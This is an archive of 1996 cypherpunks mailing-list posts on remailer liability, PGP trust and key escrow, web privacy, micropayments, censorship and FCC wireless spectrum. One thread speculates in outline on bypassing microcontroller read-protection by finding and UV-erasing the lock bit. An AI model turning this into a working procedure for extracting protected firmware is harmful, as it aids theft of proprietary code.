<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 15 Jun 1996 17:36:30 +0800
To: "John A. Perry" <perry@alpha.jpunix.com>
Subject: Re: Remailer Operator Liability?
Message-ID: <199606150439.AAA08522@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jun 96 at 8:34, John A. Perry wrote:

> 	Now that the CDA decision has been made, I was wondering how this
> would affect the liability status of the various remailer operators? In
> the past several remailers have opted to discontinue service due to
> legal/political pressure. Will this CDA decision help to decrease remailer
> operator liability?

Only if a remailer operator intends to fight legal pressure in the 
courts, which requires time, patience, hope and of course, lots of 
money and good lawyers. 

Whether the CDA decision would give one more hope etc. is debatable. 
Wait for a Supreme Ruling from the Court of Elders of the 
Constitution...


Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 17:17:23 +0800
To: tcmay@got.net
Subject: Re: PBS show
Message-ID: <m0uUnC7-00035iC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain



 I used my old
>atari 800xl to learn basic back in OOooooo 3rd grade. Damn.. Long time
>ago..........

Well I learned BASIC in 3rd grade also but that was only 5 years ago for me. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 17:25:13 +0800
To: cypherpunks@toad.com
Subject: The Louisville Desktop Publishing Conference
Message-ID: <m0uUnC3-00035gC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey are any of you guys (& ladies) going to the Louisville (KY) Desktop
Publishing Conference? Well if you are I hope to see you there and mybee we
could have lunch and talk about crypto & any other hot topics. 

The conference is July 30th, 1996. At the Hyatt Regency. Topics include
Beginners & experts look on DTP, Graphic software, Internet, Publishing on
the net, and many more topics. E-mail : INFO@natsem.com for more
information. And you ask how does a 13 year old come up with the 195 dollers
to go? I didn't my mother, Debby Wilkerson, is one of the Presentors. 

Hope to see one or more of you there. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sun, 16 Jun 1996 06:58:24 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: pretty good reputation
Message-ID: <199606142000.BAA00199@fountainhead.net>
MIME-Version: 1.0
Content-Type: text/plain


a pretty good detour. 

by what i understand pgp's "web of trust" scheme has flaws. according to 
pgp (alice trusts jane, jane trusts snoopy, bob trusts alice) implies 
bob trusts snoopy. this means that alice trusts jane to the extent, that 
if jane trusts a third person, then a fourth person who trusts alice 
automatically trusts that third person. deducing such results from a 
simple shades of trust system cannot lead to a reliable web of trust.
thats common sense.

what is required is a reputation system wherein trust is  _qualified_ 
rather than _quantified_. its senseless to say i trust him five units.
it will be more appropriate if pgp has a separate tag for "type of trust"
or something like that. 

this kind of thing can be difficult to handle, since it a fuzzy 
parameter. add to the problem a global-system like internet where all 
communication is not person to person. i was wondering if there are 
any working mathematical models for reputation systems, and how 
successful they are.

vipul ved prakash






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Sat, 15 Jun 1996 20:31:30 +0800
To: cypherpunks@toad.com
Subject: Zimmerman/Viacrypt
Message-ID: <1L3JPD7w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


Steve Reid recently posted (and sent me an Email copy - thanks Steve),

    > Phil disagrees with ViaCrypts new "business" version of PGP which
    > apparently encrypts all messages with an employer-supplied public key
    > in addition to any specified by the employee.

    Looking at Denning's critique (pro-escrow rant) of the NCR crypto
    report, she mentioned that mutant version:

    [http://www.cosc.georgetown.edu/~denning/crypto/NRC.txt]
      "Other corporations are similarly adopting products with data recovery
      capabilities as they integrate encryption into their systems (even PGP
      comes with data recovery in Viacrypt's Business Edition)."

    IMHO Phil Zimmerman has good reason to object to the mutant
    version, if it's going to cause the PGP name to somehow endorse
    escrow.

Denning is being disengenuous (so what's new). There's a big
difference between voluntary, not-government-sponsored "escrow" like
the type in the "business version" of ViaCrypt, and what Denning and
her friends in the government TLA's want.

Seems to me an employer has a perfect right to monitor his employee's
work product, for which he's being paid a salary and using the
employer's equipment (like business PGP).  If the employee doesn't
like it, he's free to seek employment elsewhere (or start his own
business).  Or he's free to encrypt all his personal Email at home
with a personal copy of ViaCrypt or a copy of free PGP.

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan L Andrews <Bryan_L_Andrews@ccm.fm.intel.com>
Date: Sat, 15 Jun 1996 21:54:18 +0800
To: cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <Sat, 15 Jun 96 03:51:58 PDT_2@ccm.fm.intel.com>
MIME-Version: 1.0
Content-Type: text/plain



Text item: 

Rob wrote: 

>This may be old hat, but an earlier post (around the time the Kocher
>RSA-timing attack came out) to the list asked about the "Elevator
>Problem", where two parties who think they share the same secret want
>to confirm it on an open channel.  I came up with an idea for a
>protocol but never got around to posting it, and dropped off the list
>briefly... so pardon me if this is already touched upon.

............

>Comments?



This reminds me of the discussions I've seen over the last few months regarding 
oblivious transfers/zero-based transactions. Good article in Scientific 
American on it a few months ago.

Bryan.


Text item: 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 15 Jun 1996 18:44:07 +0800
To: nelson@crynwr.com
Subject: Re:
In-Reply-To: <19960614111725.14796.qmail@ns.crynwr.com>
Message-ID: <Pine.LNX.3.93.960615013101.641B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jun 1996 nelson@crynwr.com wrote:

> Blake Wehlage writes:
> 
>  > They will never be able to regulate the net, look at he first and main use
>  > for it. 
> 
> What main use?  Flaming assholes who really deserve it?

	No, distribution of pornography. What takes up most (by volume) of
UseNet? What are the most popular groups? the alt.sex* groups. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 15 Jun 1996 18:50:48 +0800
To: "John A. Perry" <perry@alpha.jpunix.com>
Subject: Re: Remailer Operator Liability?
In-Reply-To: <Pine.NEB.3.93.960614082823.392A-100000@alpha.jpunix.com>
Message-ID: <Pine.LNX.3.93.960615013332.641C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jun 1996, John A. Perry wrote:

> 	Now that the CDA decision has been made, I was wondering how this
> would affect the liability status of the various remailer operators? In
> the past several remailers have opted to discontinue service due to
> legal/political pressure. Will this CDA decision help to decrease remailer
> operator liability?

	I seem to get the idea that the problem is more in the realm of
civil suits than problems with "direct" legality. I say direct, because
IANAL and I don't know the correct way to phrase it. 

	Saying it another way, it currently isn't the FBI that is the
problem, but rather the CO$.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: modemac@netcom.com (Modemac)
Date: Sat, 15 Jun 1996 23:44:28 +0800
To: cypherpunks@toad.com
Subject: Proposal: PGPmail Plugin for Netscape/Mosaic
Message-ID: <199606151252.FAA13107@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know C, unfortunately, otherwise I'd program this myself.  So 
instead I'm putting it up for debate, and to encourage any cypherpunk to 
give it a shot if he/she thinks it's a good idea.

The idea behind this utility is to encourage the use of PGP for sending 
email.  Currently, using PGP with email requires you to compose the 
message, get the recipient's public key, encrypt the message, upload it 
to your system (or transfer it over using the clipboard), and email it.  
It would be much easier if sending a PGP email message was as simple as 
clicking a mouse.  This, this idea for a PGP plugin.  It goes like this:

You create a small text file containing an email address and a PGP public 
key.  Your own email address and key would be the best choice, of course, 
but it doesn't have to be yours.  Place that file on your Web page with a 
unique extension, such as public_key.key.  Include a link to this text 
file on your page, with a standard anchor like this:

<li>Click here to send me a PGP email message

When your Web browser reads a .key file, it invokes the PGPmail plugin 
utility.  This utility calls up a window that allows you to compose your 
email message (just like a standard email form).  When you have finished 
composing the message, you click the "Send" button as usual.  The utility 
then does the following:

- Reads the public key from the .key file.
- PGP-encrypts the message with that public key, using the PGP -eat option.
- Emails that PGP-encrypted message to the address given in the .key file.

The major advantage of this utility is that it would allow you to send an 
email message to anyone who puts their public key onto their Web page in 
this fashion, without having to go through the rigamarole of getting the 
public key, saving it to a file, encrypting the message, emailing the 
message, and then deleting the public key again (to keep from bloating 
your keyring, especially if it's not someone you plan to have a regular 
conversation with).

It would also ensure security on your part, because the PGP encryption 
would take place entirely on your own system.  You wouldn't have to 
depend on a CGI script and someone else's copy of PGP, because the email 
process doesn't take place until *after* you have encrypted the email 
message.

The ability to send a PGP-encrypted email message with one click of the 
mouse would result in an explosion of PGP use over the Web.  It would 
allow safe transactions of private information, such as people already do 
with PGP - but it would be so EASY that anyone with a Web browser could 
do it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Sat, 15 Jun 1996 16:38:26 +0800
To: c2.org.remailer-operators@c2.org
Subject: alpha.c2.org problem?
Message-ID: <199606150355.FAA12203@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


For the past two days, all mail to my alias at alpha.c2.org has arrived
with the message stripped out.  All I'm getting is the end remailer's
disclaimer statement.

?????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 15 Jun 1996 23:44:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606151256.FAA18011@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have noted a clear change in the tenor of comments regarding the Hackerpunks mailing list.

Initially, there was a mocking tone; recently, however, information and ideas are being shared which may be of mutual benefit regarding privacy and the freedom to express oneself as s/he chooses.

Refreshing! 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 16 Jun 1996 03:44:29 +0800
To: cypherpunks@toad.com
Subject: Re: Comments on MicroPayments and the Web
Message-ID: <2.2.32.19960615154250.006eb6f0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 6/15/96 -0400, Perry E. Metzger wrote:

>> Just like commercial crypto, servers, news clients, and the like are all
>> superior to the free versions?
>
>Software and hardware follow different rules.

This is true enough.

On the other hand, it's true that money by itself is not (in my experience)
the deciding factor on the quality of a service provider. I moved some
months ago from the biggest ISP in town to one with a much smaller resource
base but greatly superior service in the areas that mattered to me (fast
news, reliable mail, etc). The guy in charge is making better use of what
he's got.

On the gripping hand, if my current provider had the other provider's bucks,
things could _really_ fly.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 16 Jun 1996 05:02:36 +0800
To: stevenw@best.com
Subject: Re: Here we go again
In-Reply-To: <v01540b05ade814d49805@[206.86.1.35]>
Message-ID: <JEuwx8m9LQ8E085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <v01540b05ade814d49805@[206.86.1.35]>,
stevenw@best.com (Steven Weller) wrote:
> 
> Copyright 1996 Nando.net
> Copyright 1996 The Associated Press
> 
> SEOUL, South Korea (Jun 15, 1996 00:41 a.m. EDT) -- For a Canadian
> university student, creating an Internet site on North Korea was simply
> opening a small library on the  reclusive nation. For South Korean
> authorities, it was threat to national security.
> 
> Last week, South Korea declared David Burgess' World Wide Web site
> subversive and ordered 14 local computer networks with Internet links to
> block public access to it.
> 
> The government also said it would punish anyone accessing North Korean web
> sites, taking its ideological war with its Marxist enemy into cyberspace.

I saw this, too.  The online AP report had the URL for the site at the
bottom (http://duke.usask.ca/~burgess/DPRK.html).  The site is no longer
there.

I suspect that a University president or provost or computer services 
manager had it removed.  I suspect that he or she is going to be VERY
embarassed real soon now.

-- 
Alan Bostick               | The Necronomicon was not written by the Mad Arab,
mailto:abostick@netcom.com | it was written by Scott Adams
news:alt.grelb             |      Alan Olsen <alano@teleport.com>
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sun, 16 Jun 1996 07:52:49 +0800
To: cypherpunks@toad.com
Subject: The FCC wants you!!! (fwd)
Message-ID: <199606151627.JAA26194@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
>From nanog-owner@merit.edu Sat Jun 15 01:48:51 1996
Date: Sat, 15 Jun 1996 00:12:58 -0700 (PDT)
From: Michael Dillon <michael@memra.com>
To: nanog@merit.edu
Subject: The FCC wants you!!!
Message-ID: <Pine.BSI.3.93.960615001101.4644Q-100000@sidhe.memra.com>
Organization: Memra Software Inc. - Internet consulting
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-nanog@merit.edu
Precedence: bulk


If you know American ISP's who don't normally hang out on ISP mailing
lists or if you have any contacts in the educational system who are
concerned with the cost of technology, then please forward this message to
them. Here is the opportunity for direct political action that really can
make a difference without requiring well-funded intermediaries and
lobbiests...

Michael Dillon                                   ISP & Internet Consulting
Memra Software Inc.                                 Fax: +1-604-546-3049
http://www.memra.com                             E-mail: michael@memra.com

---------- Forwarded message ----------
Date: Fri, 14 Jun 1996 22:13:01 -0600 (MDT)
From: Dave Hughes <dave@oldcolo.com>
Reply-To: inet-access@earth.com
To: inet-access@earth.com
Subject: Re: Accuracies of My Own
Resent-Date: Fri, 14 Jun 1996 23:14:53 -0500 (CDT)
Resent-From: inet-access@earth.com

Jack Rickard says:
> 
> In any event, my perception is that Dave is always early to the table, and 
> by the time the world is ready to buy something, he's already moved on.  I 
> was vaguely aware of his wireless activities, and somewhat more interested 
> in them with the recent NIIBand proposals.  There ARE some issues and I do 
> hope Dave is successful in steering this toward the 15 km version as 
> opposed to the limited range Wireless LAN version some of the big guys seem 
> to be determined to push through.
> 
> In fact, this is actually a rather key issue specifically for Internet 
> Service Providers and more specifically for those in rural areas.  As a 
> newbie to the mailing list, I may be reintroducing something that has 
> already been done to death.  But this NIIBand could be a huge advantage for 
> small ISP's in rural areas (not JUST academia and K-12 Dave) if done right, 
> and another fiasco if done wrong.  The FCC has this open for comment now. 
>  If Mr. Hughes would provide info on docket numbers and where to write, you 
> all could have a significant impact.  On the one hand, you can offer 24 
> Mbps links by radio at 10-15 km.  On the other, 3COM can do wireless LAN 
> inside a building for about 1000 feet.  All from a stroke of the FCC pen.
> 
> 
Yes, this is a far more significant issue than most ISPs realize - whether
the FCC, in both responding to the Apple-WINForum proposal to allocate
350Mhz of spectrum in the 5Ghz bands for what the FCC dubbed the 
"NII/SUPERNET" Band for 'no licence' wireless - will do that in BOTH
the 'wireless lan' segment AS WELL AS the requested '15 km' segments
and thus permit anyone, including ISPs to have no-comm cost bandwidth
up to 2Mbps between two points, or, with relay, 1Mbps (above and
below T-1) for the cost of the radios. Spread spectrum technology which
is a revolution in radio communications (wide band, digital processor
controlled low power - with no practical interference versus traditional
narrow frequency band high power - with so much interferecne, the 
frquencies have to be licenced and highly controlled).

And yes I, and a too-small handful of others are deep into the issues
at the FCC level as the decision hangs in the balance. Because I
am the Principal Investigator on the $375,700 'Wireless Field Test
for Education Project' I was invited to a roundtable with FCC
Commissioners nominally debating 'wireless for education' two weeks
ago, and, using our real-world wireless project going on in the
San Luis Valley (one school being relaibaly connected now 15 miles
at 115kbs, bypassing US West, from NT-Lan router to Cisco Router
at the POP. Zero local loop cost) and reporting on the other
projects we have examined (8 Belen, New Mexico Schools, conected
T-1 between each other in a WAN - up to 10 miles across the district.
Zero local loop cost (which would normally run $84,000 a year wiht
telco T-1 between schools).

We made an impression, but know what giant forces we are up against.
Some FCC staffers want to 'auction' the longer range (even 15km)
stuff. Some big communications companies, led by the Cellular 
Telecommunications Industry Assn - CTIA, would like all 'no-licence'
that can compete with them to be killed. 

Our arguements, that got a few thinking anyway, was that IF the FCC
rules permit radios to be made which go 15-45 miles, no licence,
no interference, and solve the problem of the 16,000 school
districts whose biggest problem is the cost of bandwidth *between*
school building of a district first, then the cost from the main
hub to the POP, second, then between the student and/or teacher
at home to the school, at 56kbs or above, THEN the problem of
'community' networking will also be solved. For school districts
are coincident where people live and log on from. (ditto ISPs)

We turned a few heads when I showed my calcuations that, if
the 14 School Districts of the SanLuis Valley are connected to
the one central POP at T-1 by US West, it will cost $1.2 million
over 10 years. If by T-1 25mile radios (yeas they exist now)
it will cost $173,000 for the same 10 years. 

Now if ISPs want to strike a blow for economic telecom freedom, 
you can start by accessing our NSF Wireless Field Test web site,
 http://wireless.oldcolo.com  and go into the Regulatory section
where you will find direct documents, links to the FCC, the
Belen Paper, and my long but piercing piece 'The Case for 
Public Spectrum' (and if you are a skeptic about the technology,
read the Paul Baran short papers - the invetor of packet switching)

Then all you have to do to sumbit public comments o the NIIBand
matter is to email:

            96-102@fcc.gov

and that is the email address for the Docket Item. You *must* comment
before July 15th, or yours will not be considered. (but under the law
and regulation, if you *do* comment, your comments must be summarized
by the staff and presented to the COmmissioners with the staff 
views. 

You do NOT have to comment on all the heavy duty technical issues.
Right from the chief FCC Engineer who drafts the rules, and was
the father of the original Spread Spectrum rules in 1985 he
says that your statemnt of what you NEED, and why, would be
much appreciated. As simple as 'I am an ISP who needs T-1 from
my site, 8 miles to the nearest POP, no licence/cost wirless,
with a radio I can afford' is to the point. (of course the more
you show your technical economic need in sophisticated terms
the better it will be received. The FCC engineers are no dummies
and political handwaving doesn't impress them (it only impresses
the COmmissioners whenthe handwavers are called AT&T or Congress)

I can just about assure you the FCC staff doesn't even know you
exist, as a class, (small ISPs) or what function you serve in the
food chain, or why you shouldn't just pay $650 a month for your
local loop T-1 like anybody else. And unless you email them
(and they now have a policy that email must be taken as seriously
as formal paper mail filings), your colective case won't even
be mentioned when the likes of Motorola, AT&T, CTIA, the NSA
(who gets gas pains when secure wireless is mentioned) are
testifying.

All will not be totally lost if this NPRM does not fly (new
spectrum) for we still have the more congested Part 15, 1 watt
bands. And the 4 NSF types who attended the FCC rountable
were impressed enough with our case that we spent a day with them
and they are about to fund a 'developmental' project that will
be done by TAPR, that may bring you that $500 T-1 plug and play
radio, with range. (by licencing the guts to mfgrs).

Matter of fact I will be in Washington DC at the NSF Monday
on this (being carrie dby my sidekick in radio engineering
matters) and two other matters. One of which will (their idea,
not ours) see part of our team in Ulaanbaatar, Mongolia in
August, linking 8 sites to the satellite Spintlink downlink
site run by Mongolian engineers in an old Soviet lab. (web
page at www.magic.mn already - but they can't get the signal
across town, so crappy is their phone system). So by September
you willbe pinging systems in Mongolia, the last 10km of
which will be wireless.

I always wanted to help set up the Ghengis Khan BBS in a Mongolian
yurt, running OS2 (cause IBM is everywhere), with NAPLPS character
sets (Chinese, Cyrilli Russian, and Mongolian - none of which
are ascii), solar powered, and with spread spectrum radios
linking China to Russia. With nary a Telco in a hundred miles.
And I got a hunch I will have that done before ISPs in NYC
do it.

Dave Hughes
dave@oldcolo.com

Oh yeah, if you http://192.160.122.3  you will reach, by wireless,
the OS2 system in my home. Not blazingly fast beacause I
am trying out a different set of radios. And teh wired 56kbs
frame relay to which it is attached is actuallythe slowest link
in the chain. But its been running 160kbs for almost a year now,
for $0 cost from me to my own Internet service.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Camp <a037716t@bcfreenet.seflin.lib.fl.us>
Date: Sun, 16 Jun 1996 00:31:57 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.3.89.9606150930.F3167-0100000@bcfreenet.seflin.lib.fl.us>
MIME-Version: 1.0
Content-Type: text/plain



I just subscribed and what the hey is pgp.  Pretty good privacy?  


-Think global, act local, recycle!
Michael Camp
a037716t@bcfreenet.seflin.lib.fl.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 16 Jun 1996 05:27:43 +0800
To: cypherpunks@toad.com
Subject: Re: Fuseable Links - no guarantees??
Message-ID: <199606151651.JAA22789@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 PM 6/14/96 -0400, Warren wrote:
>I have never paid much attention to the protection of firmware or the
>technical issues revolving around such schemes...was wondering:
>
>I recently saw an add for a UK based group that says they can take a PIC
>OTP micro and read the prom (for a fee, of course) - How the heck is this
>done?? I have my suspicion that they (somehow) magically peel off the
>ceramic coating (without destroying the chewy center), get a circuit mask
>and 'micro probe' the I/O of the IC...they then download the secret recipe
>to the afore mentioned 'chewy center'.
>
>Is this close to accurate?? How is it 'done' ???


While I have never come even close to needing to attempt this kind of thing, 
long ago it occurred to me that if the "no read" bit was stored in a 
programmable bit, and if the location of that bit was known or could be 
identified, you could expose that particular bit through a tiny mask hole 
and cause the part to be readable again.  Locating that bit (assuming 
there's just one) would be relatively simple:  Take a test part, program it, 
read-lock it, and then expose it to a VERY slowly sliding mask with UV 
behind.  Do this for both axes, to find the bit's location on the chip.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 16 Jun 1996 02:33:24 +0800
To: hendersn@zeta.org.au (Zed)
Subject: Re: Remailer Operator Liability?
In-Reply-To: <199606150753.RAA03617@godzilla.zeta.org.au>
Message-ID: <UlkgMQq00YUwQ3hq13@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 15-Jun-96 Re: Remailer Operator
Liabi.. by Zed@zeta.org.au 
> distributed to a minor who was using a nym. I think pressure on anonymous
> remailers is going to increase as various groups complain that the paw
> innocent widdle kiddies are "vulnerable to corruption"(or some bullshit like
> that) because their age can be hidden. Read the decision. The CDA _may_ be

This is true. Yesterday evening I interviewed the director of
enforcement for a TLA here in DC. He expressed his concern about
anonymous remailers and anonymity online. (More on this later.)

The word here in DC is "accountability."

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 16 Jun 1996 02:31:59 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Comments on MicroPayments and the Web
In-Reply-To: <2.2.32.19960615052947.006d85cc@mail.aracnet.com>
Message-ID: <199606151454.KAA13331@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Baugh writes:
> Hal wrote:
> >Consider two sites, one which acts as a proxy and cache but which
> >charges something under a penny per page, and another which acts for
> >free.  Won't the for-pay site be able to afford a larger disk, more
> >servers, and better net connections?  It will be a superior service.
> 
> Just like commercial crypto, servers, news clients, and the like are all
> superior to the free versions?

Software and hardware follow different rules.

Free software can often be superior because even tiny contributions by
large numbers of people can all "add up", and software has no cost to
its distribution in free form. A person of limited means who is into
the idea and has good skills and a good concept (like Phil Z.) can get
massive global distribution of their product.

Hardware, however, costs actual dollars, and many people don't have
those in large supply. Connectivity costs, too. Poor folks can't pay
for T3s, at least not at their current prices.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 16 Jun 1996 06:10:35 +0800
To: wxfield@shore.net (Warren)
Subject: Re: Fuseable Links - no guarantees??
Message-ID: <199606151810.LAA25519@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:46 PM 6/15/96 -0400, Warren wrote:
>Jim;
>
>        I was under the impression that a fuseable link was literally a
>piece of conductive material that you deliberatley 'blow-away' - In most
>cases, couldn't you simply 'tap into' the data side of the fuse, and
>download the info??

If it really is a "fusible link," that usually means a fuse, analogous to 
the much larger kinds used for circuit protection.  There are also 
"anti-fuses" which are high-resistance silicon links which on the 
application of a relatively high voltage, become low-resistance.

However, besides this, there is the typical EPROM-type cell, which can be 
programmed but not erased electrically.  (I'm ignoring cells like EEPROM 
which are designed and constructed to be electrically erased.)  As long as 
the chip contains most of its information in EPROM, that means that the chip 
was fabbed with a EPROM-compatible process, so they'd be more likely to 
include read-protection in EPROM as well.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 03:52:26 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: doubleclick monitoring web browsing habits
Message-ID: <199606151550.LAA02507@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jun 96 at 14:26, Hal wrote:

> When I run lynx (2.3.7 beta) to <URL:
> http://www.anonymizer.com/cgi-bin/snoop.pl >, it says:
> 
>    Here's a sampling of the kind of information that a site can collect
>    on you (please wait a moment):

>      Your computer is a Unix box.
>      Your Internet browser is Lynx.
>      You are coming from jobe.shell.portal.com.
>      You just visited the Anonymizer Home Page.
> 
> No user name here.

I visited there from Netscape. Didn't give my user name but 
apparently said "You are affiliated with ASB Internet, Inc. ..." and 
then displayed a bunch of advertising info by ISP puts out.

An amusing thought: fill the personal info fields with business 
advertisements.  Perhaps people who surf the web regularly can sell 
advertising space.

(insert smiling emoticon here)

> Also, when I follow a mailto: link it asks me to input the email address
> I want the mail to be from!  So I don't think it is using local user name
> information, although certainly that is potentially available to it.

Have you tried mailing yourself by putting something else in there? I 
remember trying that and seeing from the headers that I sent it (the 
usual "Received by ..." username -> machine paths.) Of course that 
was on a University's computer system, so they may have patched the 
sources.

Rob

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 03:56:42 +0800
To: cypherpunks@toad.com
Subject: Re: doubleclick monitoring web browsing habits
Message-ID: <199606151550.LAA02510@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jun 96 at 18:06, Mark M. wrote:
[..]
> but it is not enough to satisfy my paranoia.  I would be truely satisfied if
> Netscape would prompt for an e-mail address whenever it sends mail or post to
> usenet.

When I used to read the list over hks.net (still down, eh?) I would 
change my name (and sometimes address, for quasi-anonymity) with no 
problems... you just have to do that *before* you try to reply.

(Free)Agent newsreader will let you do that as part of the reply as well. 
It'll still show the path and machine that sent news, but it allows 
you to change From:, Reply-To: and Sender: fields. 

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 16 Jun 1996 04:24:24 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] (was Re: PBS show)
Message-ID: <960615114849_217908234@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Now what is actually (in depth pleaseeee) protected and real mode?
Has there been any talk of intel possibly fixing this conventional mem
problem in future chips????? Thanks..
Adam






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 16 Jun 1996 04:32:15 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] (was Re: PBS show)
In-Reply-To: <960615114849_217908234@emout09.mail.aol.com>
Message-ID: <199606151624.MAA13453@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



AwakenToMe@aol.com writes:
> Now what is actually (in depth pleaseeee) protected and real mode?
> Has there been any talk of intel possibly fixing this conventional mem
> problem in future chips????? Thanks..

We are hitting new lows here, folks.

To quote Elvis Costello, I used to be disgusted, now I try to be amused.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 16 Jun 1996 08:11:32 +0800
To: hendersn@zeta.org.au
